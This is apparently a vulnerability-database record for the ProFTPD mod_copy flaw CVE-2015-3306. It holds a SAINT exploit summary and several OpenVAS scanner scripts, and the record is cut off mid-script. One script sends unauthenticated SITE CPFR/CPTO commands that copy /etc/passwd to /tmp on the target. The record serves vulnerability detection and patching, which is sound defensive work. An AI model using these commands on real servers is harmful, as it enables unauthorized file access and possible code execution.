Added: 05/29/2015
CVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>)
BID: [74238](<http://www.securityfocus.com/bid/74238>)
OSVDB: [120834](<http://www.osvdb.org/120834>)
### Background
[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms.
### Problem
The mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP.
### Resolution
[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor.
### References
<http://bugs.proftpd.org/show_bug.cgi?id=4169>
### Limitations
Exploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled.
The target must also run a web server supporting PHP in order for the exploit to succeed.
### Platforms
Linux
{"id": "SAINT:1B08F4664C428B180EEC9617B41D9A2C", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "ProFTPD mod_copy command execution", "description": "Added: 05/29/2015 \nCVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>) \nBID: [74238](<http://www.securityfocus.com/bid/74238>) \nOSVDB: [120834](<http://www.osvdb.org/120834>) \n\n\n### Background\n\n[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms. \n\n### Problem\n\nThe mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `**SITE CPFR**` and `**SITE CPTO**` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP. \n\n### Resolution\n\n[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor. \n\n### References\n\n<http://bugs.proftpd.org/show_bug.cgi?id=4169> \n\n\n### Limitations\n\nExploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled. \n\nThe target must also run a web server supporting PHP in order for the exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "published": "2015-05-29T00:00:00", "modified": "2015-05-29T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2015-3306"], "immutableFields": [], "lastseen": "2021-07-28T14:33:38", "viewCount": 271, "enchantments": {"dependencies": {"references": [{"type": "canvas", "idList": ["PROFTPD_MOD_COPY"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0510"]}, {"type": "cve", "idList": ["CVE-2015-3306"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3263-1:84E2C", "DEBIAN:DSA-3263-1:BB481"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-3306", "DEBIANCVE:CVE-2019-12815"]}, {"type": "exploitdb", "idList": ["EDB-ID:49908"]}, {"type": "fedora", "idList": ["FEDORA:1262C6078F40", "FEDORA:5B59E60582A4", "FEDORA:6676A6078F43"]}, {"type": "freebsd", "idList": ["D0034536-FF24-11E4-A072-D050996490D0"]}, {"type": "hackerone", "idList": ["H1:1024393"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3263.NASL", "FEDORA_2015-6401.NASL", "FEDORA_2015-7086.NASL", "FEDORA_2015-7164.NASL", "FREEBSD_PKG_D0034536FF2411E4A072D050996490D0.NASL", "OPENSUSE-2015-410.NASL", "PROFTPD_1_3_5_INFO_DISC.NASL", "SLACKWARE_SSA_2015-111-12.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105254", "OPENVAS:1361412562310142662", "OPENVAS:1361412562310703263", "OPENVAS:1361412562310869338", "OPENVAS:1361412562310869352", "OPENVAS:1361412562310869541", "OPENVAS:703263"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131505", "PACKETSTORM:131555", "PACKETSTORM:131567", "PACKETSTORM:132218", "PACKETSTORM:162777"]}, {"type": "saint", "idList": ["SAINT:63FB77B9136D48259E4F0D4CDA35E957", "SAINT:950EB68D408A40399926A4CCAD3CC62E", "SAINT:FD1752E124A72FD3A26EEB9B315E8382"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32007", "SECURITYVULNS:VULN:14450"]}, {"type": "slackware", "idList": ["SSA-2015-111-12"]}, {"type": "thn", "idList": ["THN:AB717FBC8FF7C7C1D194A126C788DF50"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-3306"]}, {"type": "zdt", "idList": ["1337DAY-ID-23544", "1337DAY-ID-23720", "1337DAY-ID-36298"]}]}, "score": {"value": 8.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2015-0510"]}, {"type": "cve", "idList": ["CVE-2015-3306"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3263-1:84E2C"]}, {"type": "fedora", "idList": ["FEDORA:6676A6078F43"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC"]}, {"type": "nessus", "idList": ["FEDORA_2015-6401.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310869352"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131555"]}, {"type": "saint", "idList": ["SAINT:FD1752E124A72FD3A26EEB9B315E8382"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32007"]}, {"type": "slackware", "idList": ["SSA-2015-111-12"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-3306"]}, {"type": "zdt", "idList": ["1337DAY-ID-23720"]}]}, "exploitation": null, "vulnersScore": 8.9}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2019-05-29T18:36:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for proftpd FEDORA-2015-7164", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869541", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869541", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for proftpd FEDORA-2015-7164\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869541\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:24:03 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-3306\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for proftpd FEDORA-2015-7164\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'proftpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"proftpd on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-7164\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"proftpd\", rpm:\"proftpd~1.3.5~6.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:52:53", "description": "Vadim Melihow discovered that in\nproftpd-dfsg, an FTP server, the mod_copy module allowed unauthenticated users\nto copy files around on the server, and possibly to execute arbitrary code.", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3263-1 (proftpd-dfsg - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703263", "href": "http://plugins.openvas.org/nasl.php?oid=703263", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3263.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3263-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703263);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-3306\");\n script_name(\"Debian Security Advisory DSA 3263-1 (proftpd-dfsg - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-05-19 00:00:00 +0200 (Tue, 19 May 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3263.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"proftpd-dfsg on Debian Linux\");\n script_tag(name: \"insight\", value: \"ProFTPd is a powerful FTP daemon\nsupporting hidden directories, virtual hosts, and per-directory '.ftpaccess'\nfiles.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution\n(wheezy), this problem has been fixed in version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 1.3.5-2.\n\nWe recommend that you upgrade your proftpd-dfsg packages.\");\n script_tag(name: \"summary\", value: \"Vadim Melihow discovered that in\nproftpd-dfsg, an FTP server, the mod_copy module allowed unauthenticated users\nto copy files around on the server, and possibly to execute arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"proftpd-basic\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-dev\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-doc\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-ldap\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-mysql\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-odbc\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-pgsql\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-sqlite\", ver:\"1.3.4a-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:06", "description": "ProFTPD is prone to an unauthenticated copying of files vulnerability.", "cvss3": {}, "published": "2015-04-13T00:00:00", "type": "openvas", "title": "ProFTPD `mod_copy` Unauthenticated Copying Of Files Via SITE CPFR/CPTO", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2018-10-11T00:00:00", "id": "OPENVAS:1361412562310105254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_proftpd_unauthenticated_cpfr_cpto_04_15.nasl 11831 2018-10-11 07:49:24Z jschulte $\n#\n# ProFTPD `mod_copy` Unauthenticated Copying Of Files Via SITE CPFR/CPTO\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:proftpd:proftpd\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105254\");\n script_version(\"$Revision: 11831 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-11 09:49:24 +0200 (Thu, 11 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-13 18:15:12 +0200 (Mon, 13 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"ProFTPD `mod_copy` Unauthenticated Copying Of Files Via SITE CPFR/CPTO\");\n script_cve_id(\"CVE-2015-3306\");\n script_category(ACT_ATTACK);\n script_family(\"FTP\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_proftpd_server_detect.nasl\", \"os_detection.nasl\");\n script_require_keys(\"Host/runs_unixoide\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ProFTPD/Installed\");\n\n script_xref(name:\"URL\", value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\");\n\n script_tag(name:\"impact\", value:\"Under some circumstances this could result in remote code execution\");\n\n script_tag(name:\"vuldetect\", value:\"Try to copy /etc/passwd to /tmp/passwd.copy with SITE CPFR/CPTO\");\n\n script_tag(name:\"solution\", value:\"Ask the vendor for an update\");\n\n script_tag(name:\"summary\", value:\"ProFTPD is prone to an unauthenticated copying of files vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! loc = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # To have a reference to the Detection-NVT\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n\n send( socket:soc, data:'site cpfr /' +file + '\\n' );\n recv = recv( socket:soc, length:128 );\n\n if( \"350 File or directory exists\" >!< recv ) {\n continue;\n }\n\n send( socket:soc, data:'site cpto /tmp/passwd.copy\\n' );\n recv = recv( socket:soc, length:128 );\n\n if( \"250 Copy successful\" >< recv ) {\n close( soc );\n security_message( data: \"The target was found to be vulnerable\", port:port );\n exit( 0 );\n }\n}\n\nclose( soc );\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:07", "description": "Vadim Melihow discovered that in\nproftpd-dfsg, an FTP server, the mod_copy module allowed unauthenticated users\nto copy files around on the server, and possibly to execute arbitrary code.", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3263-1 (proftpd-dfsg - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703263", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3263.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3263-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703263\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-3306\");\n script_name(\"Debian Security Advisory DSA 3263-1 (proftpd-dfsg - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-19 00:00:00 +0200 (Tue, 19 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3263.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"proftpd-dfsg on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution\n(wheezy), this problem has been fixed in version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.5-1.1+deb8u1.\n\nFor the testing distribution (stretch) and unstable distribution\n(sid), this problem has been fixed in version 1.3.5-2.\n\nWe recommend that you upgrade your proftpd-dfsg packages.\");\n script_tag(name:\"summary\", value:\"Vadim Melihow discovered that in\nproftpd-dfsg, an FTP server, the mod_copy module allowed unauthenticated users\nto copy files around on the server, and possibly to execute arbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"proftpd-basic\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-dev\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-doc\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-mod-ldap\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-mod-mysql\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-mod-odbc\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-mod-pgsql\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"proftpd-mod-sqlite\", ver:\"1.3.4a-5+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-05-11T00:00:00", "type": "openvas", "title": "Fedora Update for proftpd FEDORA-2015-7086", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869352", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869352", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for proftpd FEDORA-2015-7086\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869352\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-11 05:51:44 +0200 (Mon, 11 May 2015)\");\n script_cve_id(\"CVE-2015-3306\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for proftpd FEDORA-2015-7086\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'proftpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"proftpd on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-7086\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157581.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"proftpd\", rpm:\"proftpd~1.3.5~5.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-24T13:44:33", "description": "An arbitrary file copy vulnerability in mod_copy in ProFTPD allows for remote\n code execution and information disclosure without authentication, a related issue to CVE-2015-3306.", "cvss3": {}, "published": "2019-07-24T00:00:00", "type": "openvas", "title": "ProFTPD <= 1.3.6 'mod_copy' Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12815", "CVE-2015-3306"], "modified": "2019-07-24T00:00:00", "id": "OPENVAS:1361412562310142662", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142662", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:proftpd:proftpd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142662\");\n script_version(\"2019-07-24T05:45:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 05:45:03 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-24 03:20:49 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-12815\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_name(\"ProFTPD <= 1.3.6 'mod_copy' Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"secpod_proftpd_server_detect.nasl\");\n 